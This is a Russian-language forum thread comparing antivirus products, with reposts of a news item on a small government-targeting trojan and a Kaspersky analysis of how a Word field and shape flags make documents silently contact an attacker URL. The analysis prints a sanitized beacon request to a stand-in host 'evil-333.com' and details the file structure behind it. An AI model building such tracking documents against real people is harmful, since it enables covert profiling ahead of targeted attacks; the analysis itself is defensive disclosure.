Recommended Posts

Пользуется ли кто антивирусом Avira ? Есть мнения?

на работе лет 6 уже Авира, на одном из домашних тоже. На других Касперский. Ни там, ни там проблем нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Пользуется ли кто антивирусом Avira ? Есть мнения?

Устанавливал Авиру, бесплатную, она обозвала все мои ломанные программы вирусами и удалила все мои кряки патчи и т.д, так же было с Маккафи и с нортон g data. Нормально работает лишь Касперский, но систему грузит не детски, в этом плане на маломощные компы лучше всего Nod 32.

  • Хорошо! 2

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

нод конечно не прихотлив но маломощен в определении реальных угроз Возникают проблемы при его сносе А впрочем любой антивирус это своеобразный наркотик загрузив который один раз будешь пользоваться им постоянно

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Был Каспер, был Нод32. Сейчас стоит Avira Free Antivirus. После Нода Авира нашла 7 вирусов и убрала поисковик, который влез ниоткуда на стартовую страницу - 404ru. До этого подцепила где-то Webalta, еле удалила. Откуда эта хрень цепляется?

  • Хорошо! 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

стоит авира на одном из компов... неплохо справляется, но в силу бесплатности иногда достает рекламой себя любимой

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

"Лаборатория Касперского" предупреждает о киберугрозе из прошлого.

 

Вирус, обнаруженный экспертами, использует уязвимости в программе для просмотра файлов PDF — Adobe Reader. "Троянец" написан на чистом Assembler и поэтому имеет просто микроскопические размеры, меньше 20 килобайт. То есть, современными компьютерами, при современных скоростях интернета, такая частица "проглатывается" незаметно для жертвы. Это, как говорят эксперты Касперского, привет из начала девяностых, когда 20 килобайт были вполне нормальным для файла размером. Удивительно то, что секреты изготовления столь малых вирусов считались давно утраченными. То есть, либо спецы старой школы возвращаются на большую дорогу, либо молодежь приобщается к классике.

"В наши дни огромное количество злоумышленников пишет множество вирусов, большинство из которых являются надстройками друг на друга и занимают мегабайты объема. Здесь мы видим всего 20 килобайт, и это удивительно. Люди, которые давно наблюдают за развитием вирусов, говорят: "Уау, привет, лихие девяностые!". Мы пока не знаем, кто это, старая гвардия или талантливые современники, но случай очень интересный", — отметил ведущий антивирусный эксперт "Лаборатории Касперского" Висенте Диаз.

Однако, как говорится, мал клоп, да вонюч: целями "троянца" стали высшие правительственные круги Украины, Бельгии, Португалии, Румынии, Чехии и Ирландии. Создатели вируса неплохо осведомлены о политических процессах внутри этих стран. Так, файлы PDF, содержащие вирус, были вполне познавательными, например, излагали внешнеполитическую программу и планы по вступлению Украины в НАТО. Каждый документ был тщательно адаптирован под конкретную жертву. Особенно интересен механизм связи "троянца" с его авторами. Как только программа попадала на компьютер жертвы, она начинала сканировать Twitter. Разработчики вируса заранее создавали записи в микроблоге, которые содержали зашифрованные кодовые слова для налаживания канала поставки украденной информации. Более того, вирус умел "уворачиваться" от антивирусных программ. Не вдаваясь в технические подробности, как только "троянец" замечал антивирусную активность, он сворачивал всю свою деятельность и "закукливался", делая свое обнаружение почти невозможным. И все это, напомним, всего в 20 килобайтах объема. Точное количество жертв вируса, как и число украденных документов, эксперты назвать затрудняются. К тому же, оно постоянно растет, ведь вирус активен и сейчас.

 

http://hitech.vesti.ru/news/view/id/1418

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
(Не)документированная особенность Word, используемая злоумышленниками

Некоторое время назад, в процессе исследования деятельности целевой атаки Freakyshelly, мы обнаружили spear-phishing рассылку писем с интересными вложенными документами. Это были файлы в формате OLE2, которые не содержали ни макросов, ни эксплойтов, ни какого-либо другого активного контента. Однако при детальном рассмотрении обнаружилось, что внутри них есть несколько ссылок на PHP-скрипты, расположенные на сторонних ресурсах. При попытке открыть эти файлы в Microsoft Word оказалось, что приложение обращается по одной из этих ссылок. В результате обращения злоумышленники получали информацию об установленном на компьютере ПО.

Зачем это плохим парням? Для успешной направленной атаки, необходимо сначала провести разведку — найти выходы на предполагаемых жертв и собрать информацию о них. Например, узнать версию операционной системы и некоторых приложений на компьютере жертвы, чтобы затем отправить соответствующий эксплойт.

В нашем случае документ выглядел так:

170911-undocumented-word-1.png

На первый взгляд — ничего подозрительного, просто набор полезных советов на тему повышения эффективности при использовании поиска Google. В документе нет активного контента, нет VBA-макросов, вложенных Flash-объектов и PE-файлов. Но после того, как пользователь открывает документ, Word отсылает следующий GET-запрос по одной из внутренних ссылок. Мы взяли оригинальный документ, используемый в атаке, и заменили подозрительные ссылки на http://evil-*, вот что получилось:

GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

Таким образом к атакующим попадала информация об установленном на машине ПО, в том числе версия Microsoft Office. Мы решили разобраться, почему Office переходит по указанной ссылке и как можно такие ссылки находить в документах.

Внутри документа Word

Первое, что бросается в глаза при рассмотрении документа, – поле INCLUDEPICTURE с одной из подозрительных ссылок. Но, как можно заметить, по факту Word обращается не по ней.

170911-undocumented-word-2.png

На самом деле блок данных на картинке выше — первый и единственный кусок текста в этом документе. Текст в документах формата Word находится в потоке WordDocument в «сыром виде», т.е. без какого-либо форматирования, за исключением так называемых полей. Поля говорят Word, что определенная часть текста должна быть показана при открытии документа специальным образом, к примеру, благодаря им мы видим активные ссылки на другие страницы документа, URL и т.п.  Поле INCLUDEPICTURE сообщает о том, что к определённым символам в тексте привязана картинка. Байт 0x13 (помечен красным) перед этим полем сигнализирует, что тут кончается «сырой текст» и начинается описание поля. Формат описания примерно таков (согласно [MS-DOC]: Word (.doc) Binary File Format):

Begin = 0x13
Sep = 0x14
End = 0x15
Field = <Begin> *<Field> [Sep] *<Field> <End>

Байт-разделитель 0x14 помечен желтым, а байт 0x15, говорящий об окончании поля, — розовым.

Ссылка на картинку в INCLUDEPICTURE должна быть в кодировке ASCII, но в данном случае она в Unicode, и поэтому Word ссылку игнорирует. Но после разделителя 0x14 идет байт 0x01 (помечен зеленым), говорящий о том, что для этой картинки есть так называемый заполнитель (placeholder), который «сообщает» редактору, что в это место должно быть вставлено изображение.  Вопрос: как его найти?

У символов и групп символов в тексте также имеются свойства, которые, как и поля, отвечают за форматирование (к примеру, они определяют, что какой-то кусок текста должен быть отображен курсивом). Свойства символов хранятся в двухуровневой таблице в потоках документа под названием xTable и Data. Не будем вдаваться в подробности разбора свойств символов – они имеют непростой формат, но в результате мы можем найти свойства символов со смещения 0x929 до 0x92C в потоке WordDocument:

170911-undocumented-word-3.png

Это как раз последовательность байт c picture placeholder’ом 0x14 0x01 0x15. В самом документе эти байты расположены по смещениям 0xB29 – 0xB2C, но поток WordDocument начинается со смещения 0x200, а смещения символов указаны относительно его начала.

Свойства группы символов CP[2] указывают на то, что к ним привязана некая картинка, которая расположена в потоке Data по смещению 0:

1FEF: prop[0]: 6A03 CPicLocation
1FF1: value[0]: 00000000 ; character = 14

Этот вывод сделан с учетом того, что в значении поля INCLUDEPICTURE указан байт 0x01, который говорит о том, что картинка должна располагаться в потоке Data по соответствующему смещению. Если бы этот значение было другим, то нужно было бы либо искать картинку в другом месте, либо проигнорировать это свойство.

Как раз тут мы натолкнулись на недокументированное свойство. Описание поля INCLUDEPICTURE в документации MS фактически отсутствует, вот что там написано:

0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section 2.16.5.33.

В стандарте ECMA-376 описана только часть INCLUDEPICTURE до байта-разделителя. Там нет ничего про то, что могут значить данные после него и как их интерпретировать. Это было основной проблемой в понимании того, что же все-таки происходит.

Итак, переходим в поток Data по смещению 0, там расположена так называемая форма SHAPEFILE:

170911-undocumented-word-4.png

Формы описаны в другом документе Microsoft: [MS-ODRAW]: Office Drawing Binary File Format. У нее есть имя, в данном случае оно тоже представляет собой другую подозрительную ссылку:

170911-undocumented-word-5.png

Но поскольку это просто имя объекта, ссылка никак не используется. В процессе разбора этой формы посмотрим на поле флагов (обведено красным):

170911-undocumented-word-6.png

Значение 0x0000000E раскладывается в комбинацию трех флагов:

  • msoblipflagURL 0x00000002
  • msoblipflagDoNotSave 0x00000004
  • msoblipflagLinkToFile 0x00000008

Это говорит о том, что к форме должны прилагаться дополнительные данные (на рисунке они обведены желтым). И что эти данные представляют собой URL, по которому уже расположено фактическое содержимое формы. Также есть флаг, который препятствует тому чтобы при открытии документа это содержимое сохранилось в самом документе – do not save.

Если посмотреть, что собой представляет этот URL, то мы обнаружим, что это та самая ссылка, по которой переходит Word при открытии документа:

170911-undocumented-word-7.png

Заметим, что кроме Word для Windows, эта «фича» присутствует в Microsoft Office для iOS и Android, а вот LibreOffice и OpenOffice ее не поддерживают: при открытии документа в этих офисных пакетах, обращения к ссылке не происходит.

Вот такой сложный механизм был создан «плохими парнями» для проведения профилирования потенциальных жертв целевых атак. Т.е. они проводят серьезные глубокие исследования, чтобы осуществлять целевые атаки и оставаться незамеченными.

Продукты «Лаборатории Касперского» умеют определять, что в документах используется описанная в статье техника, и находить ссылки, вставленные в документы посредством этой техники, чтобы затем их проверить.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
В ‎23‎.‎09‎.‎2017 в 11:42, stoic сказал:
(Не)документированная особенность Word, используемая злоумышленниками

stoic, Вы думаете здесь собрались специалисты по программированию?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Только что, Chekist сказал:

stoic, Вы думаете здесь собрались специалисты по программированию?

Не могу утверждать, но возможности каждого глупо подвергать сомнению. )))

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
3 минуты назад, stoic сказал:

Не могу утверждать, но возможности каждого глупо подвергать сомнению. )))

Зачёт :bravo:

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
1 минуту назад, stoic сказал:

Зачётку нести? ))))

Необязательно

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
11 минуту назад, Chekist сказал:

Необязательно

Жаль. Не сертифицированная продукция не пользуется спросом на рынке. ))))

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
22 часа назад, stoic сказал:

Жаль. Не сертифицированная продукция не пользуется спросом на рынке. ))))

Не скажите, не скажите. На рынке как раз проблемы с сертифицированными товарами.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас


  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу